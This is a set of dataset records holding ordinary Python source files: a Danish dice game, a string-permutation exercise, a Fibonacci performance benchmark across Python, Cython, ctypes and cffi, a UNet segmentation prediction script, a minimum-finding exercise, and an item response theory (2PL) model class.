self.checkForSejr()\n            self.skiftSpiller()\n            return 'stop'\n\nclass SpilView():\n    \"\"\"\n    This class provides a text-based user interface for the game 1-100.\n    \"\"\"\n    def __init__(self):\n        \"\"\"\n        Collects the names of the participating players, creates an instance of\n        the game from the list and shows a text menu based on the state of the game.\n        When a winner has been found, the standings and the winner's name are printed,\n        and the program ends.\n        \"\"\"\n        spillernavne = self.genererSpillerListe()\n        self.spillet = SpilController(spillernavne, 10)\n        while self.spillet.vinder == None:\n            self.printStilling()\n            print('{} har turen'.format(self.spillet.aktivSpiller.navn))\n            valg = input('Rul eller Stop? ')\n            resultat = self.spillet.spil(valg)\n            if valg == 'rul':\n                if resultat == 'død':\n                    print('Du slog 1. Turen skifter.')\n                elif resultat == 'fortsæt':\n                    print(self.spillet.aktivSpiller.baeger.showResults())\n                    self.printTurStilling()\n\n        print('\\nSpillet er slut')\n        self.printStilling()\n        print('{} er vinderen!'.format(self.spillet.vinder.navn))\n\n    def genererSpillerListe(self):\n        \"\"\"\n        Generates a list of strings with the players' names (capitalized)\n        from the player's input and returns it.\n        \"\"\"\n        spillerliste = []\n        nyspiller = None\n        while nyspiller != '':\n            nyspiller = input('Indtast navn på spiller eller ENTER for at færdiggøre\\n')\n            spillerliste.append(nyspiller.title())\n        return spillerliste[:len(spillerliste)-1]\n\n    def printStilling(self):\n        \"\"\"\n        Prints the current standings of the game.\n        \"\"\"\n        print('Stilling:')\n        for spiller in self.spillet.spillere:\n            print('{}: {}'.format(spiller.navn, spiller.points))\n\n    def printTurStilling(self):\n        \"\"\"\n        Prints the points earned so far by the active player.\n        \"\"\"\n        print('Tur: {}\\n'.format(self.spillet.aktivSpiller.turPoints))\n\nif __name__ == '__main__':\n    SpilView()\n","repo_name":"joshtempest/Atom","sub_path":"HTX Vordingborg/Programmering/Random/spil.py","file_name":"spil.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"da","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17430865342","text":"from __future__ import print_function\n\"\"\"\n# Prompt\n# 1.2 : Given two strings, write a method to decide if one is a permutation of other.\n# Example:\n# \"sumit\" and \"tiums\" are permutations of each other.\n# \"abcd\" and \"bdea\" are not permutations of each other.\n\"\"\"\n\nprint(\"1.2\")\n\n\"\"\"\n# IsStringPermutation\n# This function takes in two strings then moves through each slot\n# in string 2 comparing if they have the same letters and if they\n# are the same size with the same variables they are the\n# permutation of each other.\n\"\"\"\ndef IsStringPermutation(xString1, xString2):\n    sameLetterCount = 0\n\n    if IsSameSize(xString1, xString2):\n        for x in range(len(string1)):\n            for i in range(len(string2)):\n                if string1[x] == string2[i]:\n                    sameLetterCount = sameLetterCount + 1\n        if sameLetterCount == len(string1) and sameLetterCount == len(string2):\n            return True\n        else:\n            return False\n    else:\n        return False\n\n\n\"\"\"\n    IsSameSize\n    This function takes two strings in and returns if they are the\n    same size or not with a true or false return\n\"\"\"\ndef IsSameSize(xString1, xString2):\n    if len(xString1) == len(xString2):\n        return True\n    else:\n        return False\n\n\n\"\"\"\n    PrintResult\n    This function takes in a true or false and returns the\n    correct output message depending on what was passed in.\n\"\"\"\ndef PrintResult(xResult):\n    if xResult:\n        print(\"\\nTwo Strings are permutations\")\n    else:\n        print(\"\\nStrings are not permutations\")\n\n\nprint(\"\\nStarting Program\\n\")\n\nstring1 = \"sumit\"\nstring2 = \"tiums\"\n\nprint(\"String 1:\", string1)\nprint(\"String 2:\", string2)\n\nresult = IsStringPermutation(string1, string2)\n\nPrintResult(result)\n\nprint(\"\\nThe Big O of this Solution is O(n^2)\")\n\nprint(\"\\nEnd of Program\")\n","repo_name":"cameronww7/Python-Workspace","sub_path":"CTCI/C-1/1.2.py","file_name":"1.2.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18141068314","text":"#! 
/usr/bin/env python3\n\nimport time\nimport ctypes\n\nimport pyximport\nimport cffi\n\nimport cutils\n\nN = 36\n\ndef rfib(n):\n if n < 2:\n return 1\n return rfib(n-1) + rfib(n-2)\n\ndef fib(n):\n a, b = 1, 1\n for _ in range(n):\n a,b = a+b, a\n return b\n\ndef pour_python():\n start_ts = time.time()\n rres = rfib(N)\n end_ts = time.time()\n print(f\"[python] rres = {rres}, time = {end_ts - start_ts}\")\n start_ts = time.time()\n res = fib(N)\n end_ts = time.time()\n print(f\"[python] res = {res}, time = {end_ts - start_ts:.09f}\")\n\ndef cython():\n import cyutils\n start_ts = time.time()\n rres = cyutils.rfib(N)\n end_ts = time.time()\n print(f\"[cython] rres = {rres}, time = {end_ts - start_ts}\")\n start_ts = time.time()\n res = cyutils.fib(N)\n end_ts = time.time()\n print(f\"[cython] res = {res}, time = {end_ts - start_ts:.09f}\")\n\ndef ctypes_fib():\n lib = ctypes.cdll.LoadLibrary('./ctypes_lib/libutils.so')\n lib.fib.restype = ctypes.c_int\n lib.fib.argstype = [ctypes.c_int]\n lib.rfib.restype = ctypes.c_int\n lib.rfib.argstype = [ctypes.c_int]\n\n start_ts = time.time()\n rres = lib.rfib(N)\n end_ts = time.time()\n print(f\"[ctypes] rres = {rres}, time = {end_ts - start_ts}\")\n start_ts = time.time()\n res = lib.fib(N)\n end_ts = time.time()\n print(f\"[ctypes] res = {res}, time = {end_ts - start_ts:.09f}\")\n\ndef cffi_fib():\n ffi = cffi.FFI()\n cffi_lib = ffi.dlopen('./cffi_lib/libutils.so')\n ffi.cdef('''\n int rfib(int);\n int fib(int);\n ''')\n\n start_ts = time.time()\n rres = cffi_lib.rfib(N)\n end_ts = time.time()\n print(f\"[cffi] rres = {rres}, time = {end_ts - start_ts}\")\n start_ts = time.time()\n res = cffi_lib.fib(N)\n end_ts = time.time()\n print(f\"[cffi] res = {res}, time = {end_ts - start_ts:.09f}\")\n\ndef capi():\n start_ts = time.time()\n rres = cutils.rfib(N)\n end_ts = time.time()\n print(f\"[capi] rres = {rres}, time = {end_ts - start_ts}\")\n start_ts = time.time()\n res = cutils.fib(N)\n end_ts = time.time()\n print(f\"[capi] res = {res}, time = {end_ts - start_ts:.09f}\")\n\ndef main():\n pour_python()\n cython()\n ctypes_fib()\n cffi_fib()\n capi()\n\nif __name__ == \"__main__\":\n pyximport.install()\n main()\n","repo_name":"mailcourses/hse_deep_python_autumn_2023","sub_path":"lesson-13/src/perf.py","file_name":"perf.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"15387293865","text":"import argparse\nimport logging\nimport os\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom utils.data_loading import BasicDataset\nfrom unet import UNet\nfrom utils.utils import plot_img_and_mask\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef predict_img(net,\n full_img,\n device,\n scale_factor=1,\n out_threshold=0.5):\n net.eval()\n img = torch.from_numpy(BasicDataset.preprocess(full_img, scale_factor, is_mask=False))\n img = img.unsqueeze(0)\n img = img.to(device=device, dtype=torch.float32)\n\n with torch.no_grad():\n output = net(img)\n\n if net.n_classes > 1:\n probs = F.softmax(output, dim=1)[0]\n else:\n probs = torch.sigmoid(output)[0]\n\n tf = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Resize((full_img.size[1], full_img.size[0])),\n transforms.ToTensor()\n ])\n\n full_mask = tf(probs.cpu()).squeeze()\n\n if net.n_classes == 1:\n return (full_mask > out_threshold).numpy()\n else:\n return F.one_hot(full_mask.argmax(dim=0), 
net.n_classes).permute(2, 0, 1).numpy()\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Predict masks from input images')\n parser.add_argument('--model', '-m', default='MODEL.pth', metavar='FILE',\n help='Specify the file in which the model is stored')\n parser.add_argument('--input', '-i', metavar='INPUT', nargs='+', help='Filenames of input images')\n parser.add_argument('--output', '-o', metavar='OUTPUT', nargs='+', help='Filenames of output images')\n parser.add_argument('--viz', '-v', action='store_true',\n help='Visualize the images as they are processed')\n parser.add_argument('--no-save', '-n', action='store_true', help='Do not save the output masks')\n parser.add_argument('--mask-threshold', '-t', type=float, default=0.5,\n help='Minimum probability value to consider a mask pixel white')\n parser.add_argument('--scale', '-s', type=float, default=0.5,\n help='Scale factor for the input images')\n parser.add_argument('--amp', action='store_true', default=False, help='Use mixed precision')\n parser.add_argument('--bilinear', action='store_true', default=False, help='Use bilinear upsampling')\n parser.add_argument('--classes', '-c', type=int, default=4, help='Number of classes')\n\n return parser.parse_args()\n\n\ndef get_output_filenames(args):\n def _generate_name(fn):\n split = os.path.splitext(fn)\n return f'{split[0]}_OUT{split[1]}'\n\n return args.output or list(map(_generate_name, args.input))\n\n\ndef mask_to_image(mask: np.ndarray):\n if mask.ndim == 2:\n return Image.fromarray((mask * 255).astype(np.uint8))\n elif mask.ndim == 3:\n return Image.fromarray((np.argmax(mask, axis=0) * 255 / mask.shape[0]).astype(np.uint8))\n\ndef generate_img_from_points(txtpath, name):\n coords = []\n with open(os.path.join(txtpath,name), 'r') as f:\n lines = f.readlines()\n for line in lines:\n line = line.split(',')\n coords.append([float(line[0]),float(line[1])])\n coords = np.array(coords)\n y,x = coords.T\n y = abs(y-max(y))\n coords[:,0] = y\n print(np.max(x), np.max(y))\n plt.figure(figsize=(15, 15*(np.max(y)/np.max(x))))\n plt.xlim(0, np.max(x))\n plt.ylim(0, np.max(y))\n plt.axis('off')\n plt.scatter(x,y, s=5/(2**2))#, c=atoms_class_alline)\n plt.savefig(os.path.join(txtpath,'test_ml_4cls.png'), \\\n bbox_inches='tight', pad_inches=0, dpi=int(1*60))\n #plt.show()\n plt.close()\n\n img = cv2.imread(os.path.join(txtpath,'test_ml_4cls.png'), cv2.IMREAD_GRAYSCALE)\n img = abs(255-img)\n cv2.imwrite(os.path.join(txtpath,'test_ml_4cls.png'), img)\n ishape = img.shape\n print(ishape)\n # cv2.imshow('black_white',img)\n # cv2.waitKey(2000)\n x_1 = np.round(x*ishape[1]/np.max(x)); y_1 = ishape[0]-np.round(y*ishape[0]/np.max(y))\n x_1 = np.where(x_1>=ishape[1], ishape[1]-1, x_1)\n y_1 = np.where(y_1>=ishape[0], ishape[0]-1, y_1)\n coords = np.concatenate((y_1.reshape(-1,1), x_1.reshape(-1,1)), axis=1)\n return torch.Tensor(img/np.max(img)), torch.Tensor(coords)\n\nif __name__ == '__main__':\n args = get_args()\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n # in_files = args.input\n # out_files = get_output_filenames(args)\n\n #generate_img_from_points and add path\n # txtpath = '/hardisk/image_process/real_images/grain+boundry+disloaction'\n # name = 'grain boundary dislocation_pos_circularMask.txt'\n # txtpath = r'/hardisk/image_process/model_implication/811 LPSCl data needs phase segmentation/0067/crop'\n # name = r'5MX BF 0067.s_pos_guassianMask (2).txt'\n txtpath = r'/hardisk/image_process/RUnet/Pytorch-UNet/data/5samples/0070 crop/gaussion no 
sample iter2/0070 crop'\n    name = r'0070 crop_pos_guassianMask.txt'\n    images, coors = generate_img_from_points(txtpath, name)\n    images = images.unsqueeze(dim=0).unsqueeze(dim=0)\n    images = images.to(device=device, dtype=torch.float32)\n    coors = coors.to(device=device, dtype=torch.float32).long()\n    net = UNet(n_channels=1, n_classes=args.classes, bilinear=args.bilinear)\n\n    logging.info(f'Loading model {args.model}')\n    logging.info(f'Using device {device}')\n\n    net.to(device=device)\n    net.load_state_dict(torch.load(args.model, map_location=device))\n\n    logging.info('Model loaded!')\n\n    net.eval()\n    with torch.cuda.amp.autocast(enabled=args.amp):\n        masks_pred = net(images) \n        print(masks_pred.shape) \n        h_idx = coors[:,0].clone().detach()\n        w_idx = coors[:,1].clone().detach()\n        labels_pred= masks_pred[0].clone().permute(1,2,0)[h_idx, w_idx]\n        length_points = len(labels_pred[0])\n        labels_pred = torch.nn.functional.softmax(labels_pred, dim=1)\n        # print(labels_pred[110:120])\n        labels_pred = torch.argmax(labels_pred, dim=1)\n        coors_label = torch.cat((coors, labels_pred.unsqueeze(dim=1)), dim=1)\n        np.savetxt(os.path.join(txtpath, 'predict_4classes_4w.txt') ,np.array(coors_label.cpu()))\n        y = abs(coors[:,0].cpu()-max(coors[:,0].cpu())); x = coors[:,1].cpu()\n        pre = coors_label[:,2].cpu()\n        color_label = []\n        for num in pre:\n            if num == 0:\n                color_label.append('#0593A2')\n            elif num == 1:\n                color_label.append('#E3371E')\n            elif num == 2:\n                color_label.append('#151F30')\n            elif num == 3:\n                color_label.append('#BF9000')\n        ax = plt.gca()\n        ax.set_aspect(1)\n        plt.scatter(x, y, s=1, c=color_label)#, cmap='Dark2')\n        plt.savefig(os.path.join(txtpath, 'predict_4classes_4w'),dpi=400)\n        plt.show()\n","repo_name":"xinhuolin/HaUnet_paper","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":6883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
+{"seq_id":"24546614802","text":"'''\nThe informatics teacher calls the roll in a strange way again today.\n\nYeongil tried thinking differently again today:\nit seems not all of the attendance numbers were called... what was the lowest number?\n\nWhen attendance numbers are called n times at random, print the lowest number.\n'''\n\nn = int(input())\ncall_list = list(map(int, input().split()))\n\nm = call_list[0]\nfor i in range(1, n):\n    if call_list[i] < m:\n        m = call_list[i]\n\nprint(m)\n","repo_name":"rickcmc02/Algorithm","sub_path":"CodeUp/02_Python100/6094_이상한 출석 번호 부르기3.py","file_name":"6094_이상한 출석 번호 부르기3.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11160139030","text":"import os\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom scipy.special import expit as sigmod\nfrom scipy.optimize import minimize\nimport tempfile\nimport logging\n\n\n\nclass UIrt2PL:\n    # logger = logging.getLogger()\n\n    def __init__(self, D=1.702, logger=logging.getLogger()):\n        self.D = D\n        self.k = 1\n        self.user_vector = None\n        self.item_vector = None\n        self.logger = logger\n        self.model = None\n        self.response_sequence = None\n\n    def fit(self, response: pd.DataFrame, sequential=True):\n        \"\"\"\n        :param response_df: response data; must contain the three columns user_id item_id answer\n        D=1.702\n        \"\"\"\n        assert response is not None\n        if 'new_difficulty' in response.columns and 'b' not in response.columns:\n            response.rename(columns={'new_difficulty': 'b'}, inplace=True)\n        elif 'difficulty' in response.columns and 'b' not in response.columns:\n            response.rename(columns={'difficulty': 'b'}, inplace=True)\n\n        if 'discrimination' in response.columns and 'a' not in response.columns:\n            response.rename(columns={'discrimination': 'a'}, inplace=True)\n        elif 'a' not in response.columns:\n            response.loc[:, 'a'] = 1\n\n        if sequential:\n            labels = {'user_id', 'item_id', 'answer', 'a', 'b', 'create_time', 'knowledge_id'}.intersection(\n                response.columns)\n            self.response_sequence = response[list(labels)]\n\n            self.response_matrix = self.response_sequence.pivot(index=\"user_id\", columns=\"item_id\", values='answer')\n\n        else:\n            self.response_matrix = response.copy()\n            self.response_matrix.index.name = 'user_id'\n            # generate sequence data from the matrix form\n            self.response_sequence = pd.melt(self.response_matrix.reset_index(), id_vars=['user_id'],\n                                             var_name=\"item_id\",\n                                             value_name='answer')\n            # drop missing values\n            self.response_sequence.dropna(inplace=True)\n\n        #\n        self._init_model()\n        labels = set(response.columns).intersection({'a', 'b', 'c'})\n        if sequential and labels:\n            item_info = response[['item_id'] + list(labels)].drop_duplicates(subset=['item_id'])\n            item_info.set_index('item_id', inplace=True)\n            self.set_abc(item_info, columns=list(labels))\n\n        ret = self.estimate_theta()\n        self.model = self.user_vector\n        return ret\n\n    def _init_model(self):\n        assert self.response_sequence is not None\n        user_ids = list(self.response_matrix.index)\n        user_count = len(user_ids)\n        item_ids = list(self.response_matrix.columns)\n        item_count = len(item_ids)\n        self.user_vector = pd.DataFrame({\n            'iloc': np.arange(user_count),\n            'user_id': user_ids,\n            'theta': np.zeros(user_count)},\n            index=user_ids)\n        self.item_vector = pd.DataFrame(\n            {'iloc': np.arange(item_count),\n             'item_id': item_ids,\n             'a': np.ones(item_count),\n             'b': np.zeros(item_count),\n             'c': np.zeros(item_count)}, index=item_ids)\n\n        self.response_sequence = self.response_sequence.join(self.user_vector['iloc'].rename('user_iloc'), on='user_id',\n                                                             how='left')\n        self.response_sequence = self.response_sequence.join(self.item_vector['iloc'].rename('item_iloc'), on='item_id',\n                                                             how='left')\n        # aggregate each examinee's response statistics\n        # user_stat = self.response_sequence.groupby('user_id')['answer'].aggregate(['count', 'sum']).rename(\n        #     columns={'sum': 'right'})\n        # note: difficulty is a float, so convert it to int first, then compute the response distribution for each difficulty\n        x = self.response_sequence.astype({'b': 'int32'}).groupby(['user_id', 'b']).aggregate(\n            {'answer': ['count', 'sum']})\n        y = x.unstack()\n        y.columns = [(col[1] + \"_\" + str(int(col[2]))).strip().replace('sum', 'right') for col in y.columns.values]\n\n        for i in range(1, 6):\n            i = int(i)\n            if 'right_%s' % i in y.columns:\n                y.loc[:, 'accuracy_%s' % i] = y['right_%s' % i] / y['count_%s' % i]\n\n        y.loc[:, 'count_all'] = y.filter(regex='^count_', axis=1).sum(axis=1)\n        y.loc[:, 'right_all'] = y.filter(regex='^right_', axis=1).sum(axis=1)\n        y.loc[:, 'accuracy_all'] = y['right_all'] / y['count_all']\n\n        self.user_vector = self.user_vector.join(y, how='left')\n        # self.user_vector.fillna({'count': 0, 'right': 0}, inplace=True)\n        # self.user_vector['accuracy'] = self.user_vector['right'] / self.user_vector['count']\n\n        # aggregate the response statistics for each item\n        item_stat = self.response_sequence.groupby('item_id')['answer'].aggregate(['count', 'sum']).rename(\n            columns={'sum': 'right'})\n        self.item_vector = self.item_vector.join(item_stat, how='left')\n        self.item_vector.fillna({'count': 0, 'right': 0}, inplace=True)\n        self.item_vector['accuracy'] = self.item_vector['right'] / self.item_vector['count']\n\n    def set_theta(self, values):\n        \"\"\"\n\n        Parameters\n        ----------\n        values\n\n        Returns\n        -------\n\n        \"\"\"\n        assert isinstance(values, pd.DataFrame) or isinstance(values,\n                                                              np.ndarray), \"values must be a pandas.DataFrame or numpy.ndarray\"\n\n        if self.user_vector is None:\n            assert isinstance(values, pd.DataFrame), \"values must be a pandas.DataFrame\"\n            user_count = len(values)\n            user_ids = list(values.index)\n\n            self.user_vector = pd.DataFrame({\n                'iloc': np.arange(user_count),\n                'user_id': user_ids,\n                'theta': values.loc[:, 'theta'].values.flatten(),\n            },\n                index=user_ids)\n\n        else:\n            if isinstance(values, pd.DataFrame):\n                # self.user_vector = values\n                self.user_vector.loc[values.index, 'theta'] = values.loc[:, 'theta'].values.flatten()\n\n            elif isinstance(values, np.ndarray):\n                self.user_vector.loc[:, 'theta'] = values.flatten()\n\n            else:\n                raise TypeError(\"values must be a pandas.DataFrame or numpy.ndarray\")\n\n    def set_abc(self, values, columns=None):\n        \"\"\"\n        values can be a pandas.DataFrame or a numpy.ndarray.\n        When values is a pandas.DataFrame, shape=(n,len(columns)), one row per item;\n        pandas.DataFrame.index is item_id, and the columns include a, b, c.\n\n        When values is a numpy.ndarray, shape=(n,len(columns)), one row per item, with columns matching the columns parameter.\n        Parameters\n        ----------\n        values\n        columns  the columns to set\n\n        Returns\n        -------\n\n        \"\"\"\n\n        assert isinstance(values, pd.DataFrame) or isinstance(values,\n                                                              np.ndarray), \"values must be a pandas.DataFrame or numpy.ndarray\"\n        if columns is None:\n            if isinstance(values, pd.DataFrame):\n                columns = [x for x in ['a', 'b', 'c'] if x in values.columns]\n            else:\n                raise ValueError(\"columns must be specified\")\n\n        if self.item_vector is None:\n            assert isinstance(values, pd.DataFrame), \"values must be a pandas.DataFrame\"\n            item_count = len(values)\n            item_ids = list(values.index)\n\n            self.item_vector = pd.DataFrame({\n                'iloc': np.arange(item_count),\n                'item_id': item_ids,\n                'a': np.ones(item_count),\n                'b': np.zeros(item_count),\n                'c': np.zeros(item_count),\n\n            },\n                index=item_ids)\n\n            self.item_vector.loc[:, columns] = values.loc[:, columns].values\n\n        else:\n            if isinstance(values, pd.DataFrame):\n                # self.user_vector = values\n                self.item_vector.loc[values.index, columns] = values.loc[:, columns].values\n\n            elif isinstance(values, np.ndarray):\n                self.item_vector.loc[:, columns] = values\n\n            else:\n                raise TypeError(\"values must be a pandas.DataFrame or numpy.ndarray\")\n\n    def set_items(self, items: pd.DataFrame):\n        self.item_vector = items\n\n    def set_users(self, users: pd.DataFrame):\n        self.user_vector = users\n\n    def predict_s(self, users, items):\n        n = len(users)\n        m = len(items)\n        assert n == m, \"should length(users)==length(items)\"\n\n        user_v = self.user_vector.loc[users, ['theta']]\n\n        if isinstance(items, pd.DataFrame) and set(items.columns).intersection({'a', 'b'}):\n            item_v = items.loc[:, ['a', 'b']]\n        else:\n            item_v = self.item_vector.loc[items, ['a', 'b']]\n\n        z = self.D * item_v['a'].values * (user_v['theta'].values - item_v['b'].values)\n        # z = alpha * (theta - beta)\n        e = np.exp(z)\n        s = e / (1.0 + e)\n        return s\n\n    def predict_x(self, users, items):\n        if isinstance(items, pd.DataFrame):\n            self.set_items(items)\n        if isinstance(users, pd.DataFrame):\n            self.set_theta(users)\n\n        user_count = len(users)\n        item_count = len(items)\n        theta = self.user_vector.loc[users, 'theta'].values.reshape((user_count, 1))\n        a = self.item_vector.loc[items, 'a'].values.reshape((1, item_count))\n        b = self.item_vector.loc[items, 'b'].values.reshape((1, item_count))\n        # c = self.item_vector.loc[items, 'c'].values.reshape((1, item_count))\n        # c = c.repeat(user_count, axis=0)\n        z = self.D* a.repeat(user_count, axis=0) * (\n                theta.repeat(item_count, axis=1) - b.repeat(user_count, axis=0))\n        prob_matrix = sigmod(z)\n        # e = np.exp(z)\n        # s = e / (1.0 + e)\n        return prob_matrix\n\n    def predict_simple(self, user_id, items: pd.DataFrame):\n        \"\"\"\n\n        Parameters\n        ----------\n        theta\n        items\n\n        Returns\n        -------\n\n        \"\"\"\n        if user_id not in self.user_vector.index:\n            self.logger.warning('IRT ' + str(user_id) + ' no_irt_theta')\n            return pd.Series(data=[np.nan] * len(items), index=items.index), None\n\n        if 'new_difficulty' in items.columns and 'b' not in items.columns:\n            # candidate_items.rename(columns={'new_difficulty': 'b'}, inplace=True)\n            items['b'] = items['new_difficulty']\n        elif 'difficulty' in items.columns and 'b' not in items.columns:\n            # candidate_items.rename(columns={'difficulty': 'b'}, inplace=True)\n            items['b'] = items['difficulty']\n        if 'discrimination' in items.columns and 'a' not in items.columns:\n            # candidate_items.rename(columns={'discrimination': 'a'}, inplace=True)\n            items['a'] = items['discrimination']\n        elif 'a' not in items.columns:\n            items.loc[:, 'a'] = 1\n\n        theta = self.user_vector.loc[user_id, 'theta']\n        a = items.loc[:, ['a']].values\n        b = items.loc[:, ['b']].values\n        z = self.D * a * (theta - b)\n        prob = sigmod(z)\n        # items['irt'] = prob\n        return pd.Series(data=prob.flatten(), index=items.index), theta\n\n    def predict_by_theta(self, theta, items: pd.DataFrame):\n        \"\"\"\n\n        Parameters\n        ----------\n        theta\n        items\n\n        Returns\n        -------\n\n        \"\"\"\n        b = items.loc[:, ['b']].values\n        z = self.D * (theta - b)\n        prob = sigmod(z)\n        # items['irt'] = prob\n        return pd.Series(data=prob.flatten(), index=items.index), theta\n\n    def _prob(self, theta: np.ndarray, a: np.ndarray, b: np.ndarray, c: np.ndarray = None):\n        \"\"\"\n\n        Parameters\n        ----------\n        theta  shape=(n,1), where n is the number of students\n        a  shape=(1,m), where m is the number of items\n        b  shape=(1,m), where m is the number of items\n        c  shape=(1,m), where m is the number of items\n\n        Returns\n        -------\n\n        \"\"\"\n\n        z = self.D * a * (theta.reshape(len(theta), 1) - b)\n        # print(type(z))\n        if c is None:\n            return sigmod(z)\n        return c + (1 - c) * sigmod(z)\n\n    def _object_func(self, theta: np.ndarray, y: np.ndarray, a: np.ndarray = None, b: np.ndarray = None,\n                     c: np.ndarray = None):\n        \"\"\"\n        .. math::\n            Object function = - \\\ln L(x;\\\theta)=-(\\\sum_{i=0}^n ({y^{(i)}} \\\ln P + (1-y^{(i)}) \\\ln (1-P)))\n        Parameters\n        ----------\n        theta\n        a\n        b\n        c\n\n        Returns\n        -------\n        res : OptimizeResult\n\n        The optimization result represented as a OptimizeResult object.\n        Important attributes are: x the solution array, success a Boolean flag indicating if the optimizer\n        exited successfully and message which describes the cause of the termination.\n        See OptimizeResult for a description of other attributes.\n        \"\"\"\n\n        # predicted values\n        y_hat = self._prob(theta=theta, a=a, b=b)\n        # response records are usually incomplete and contain missing values; they are set to 0 before the sum, which does not affect the result\n        # if y_hat contains 0 or 1, the log cannot be taken\n        # if (y_hat == 1.0).any() or (y_hat == 0).any():\n        #     print('dfsfdf')\n        # np.seterr(divide='ignore')\n        # try:\n        obj = y * np.log(y_hat) + (1 - y) * np.log(1 - y_hat)\n        # except RuntimeWarning:\n        #     print('dfdf')\n\n        # obj[np.isneginf(obj)] = 0\n        # np.seterr(divide='warn')\n        # np.where cannot handle missing values: where treats a missing value as true\n        # obj = - np.sum(np.where(y, np.log(y_hat), np.log(1 - y_hat)))\n        # print('obj', obj)\n        # the objective function is not averaged\n        return - np.sum(np.nan_to_num(obj, copy=False))\n\n    def _jac_theta(self, theta: np.ndarray, y: np.ndarray, a: np.ndarray = None, b: np.ndarray = None,\n                   c: np.ndarray = None):\n        # predicted values\n        y_hat = self._prob(theta=theta, a=a, b=b)\n        # first derivative\n        # each column is one sample; average over all samples\n        _all = self.D * a * (y_hat - y)\n\n        # response records are usually incomplete and contain missing values; they are set to 0 before the sum, which does not affect the result\n        grd = np.sum(np.nan_to_num(_all, copy=False), axis=1)\n        # grd = grd.reshape(len(grd), 1)\n        # print(grd.shape, file=sys.stderr)\n        return grd\n\n    def estimate_theta(self, tol=None, options=None, bounds=None):\n        \"\"\"\n        Estimate the students' ability values given known item parameters.\n        See https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize.html#scipy.optimize.minimize for the optimization algorithms\n\n        Parameters\n        ----------\n        method  optimization algorithm, one of CG, Newton-CG, L-BFGS-B\n        tol\n        options\n        bounds\n        join  join=True estimates all students jointly; otherwise each student is estimated independently\n\n        Returns\n        -------\n\n        \"\"\"\n        item_count = len(self.item_vector)\n        if 'a' in self.item_vector.columns:\n            a = self.item_vector.loc[:, 'a'].values.reshape(1, item_count)\n        else:\n            a = None\n\n        b = self.item_vector.loc[:, 'b'].values.reshape(1, item_count)\n        # if 'c' in self.item_vector.columns:\n        #     c = self.item_vector.loc[:, 'c'].values.reshape(1, item_count)\n        # else:\n        #     c = None\n\n        success = []\n\n        # self._es_res_theta = []\n\n        # estimate each person independently\n        for index, row in self.response_matrix.iterrows():\n            # note that y may contain missing values\n            yy = row.dropna()\n            # len(y) == len(y.dropna())\n            # all answers correct\n            if yy.sum() == len(yy):\n                theta = self.response_sequence.loc[self.response_sequence['user_id'] == index, 'b'].max() + 0.5\n                success.append(True)\n                # self._es_res_theta.append(res)\n            elif yy.sum() == 0:\n                # all answers wrong\n                theta = self.response_sequence.loc[self.response_sequence['user_id'] == index, 'b'].min() - 0.5\n                success.append(True)\n            else:\n                y = row.values.reshape(1, len(row))\n                theta = self.user_vector.loc[index, 'theta']\n\n                res = minimize(self._object_func, x0=[theta], args=(y, a, b), jac=self._jac_theta,\n                               bounds=bounds, options=options, tol=tol)\n                theta = res.x[0]\n                success.append(res.success)\n\n                # self._es_res_theta.append(res)\n            # an all-wrong estimate would be below 0\n            theta = 0 if theta < 0 else theta\n\n            self.user_vector.loc[index, 'theta'] = theta\n\n        return all(success)\n\n    def to_dict(self):\n        return self.user_vector['theta'].to_dict()\n\n    @classmethod\n    def from_dict(cls, serialize_data):\n        obj = cls()\n        index = []\n        theta = []\n        for key, value in serialize_data.items():\n            index.append(key)\n            theta.append(value)\n        obj.set_theta(pd.DataFrame({'theta': theta}, index=index))\n        return obj\n\n    def to_pickle(self):\n        fh = tempfile.TemporaryFile(mode='w+b')\n        self.user_vector.to_pickle(path=fh)\n        fh.seek(0)\n        data = fh.read()\n        fh.close()\n        return data\n\n    @classmethod\n    def from_pickle(cls, data):\n        fh = tempfile.TemporaryFile(mode='w+b')\n        fh.write(data)\n        fh.seek(0)\n        user_vector = pd.read_pickle(fh)\n        fh.close()\n        obj = cls()\n        # the cf constructor needs the 0-1 responses converted to the -1,1 form,\n        # so the data cannot be passed in through the constructor here\n        obj.user_vector = user_vector\n        return obj\n\n    def get_user_vector(self, user_id):\n        if self.user_vector is not None and len(self.user_vector) > 0:\n            if user_id in self.user_vector.index:\n                return self.user_vector.loc[user_id, :]\n        return None\n\n    def get_user_info(self, user_id):\n        vector = self.get_user_vector(user_id=user_id)\n        if not vector:\n            return None\n\n        # theta = vector.get('theta',None)\n        # theta = vector.get('accuracy_all',None)\n        # theta = vector.get('count_all',None)\n","repo_name":"zhangzhenhu/prophet","sub_path":"feature/irt.py","file_name":"irt.py","file_ext":"py","file_size_in_byte":18504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
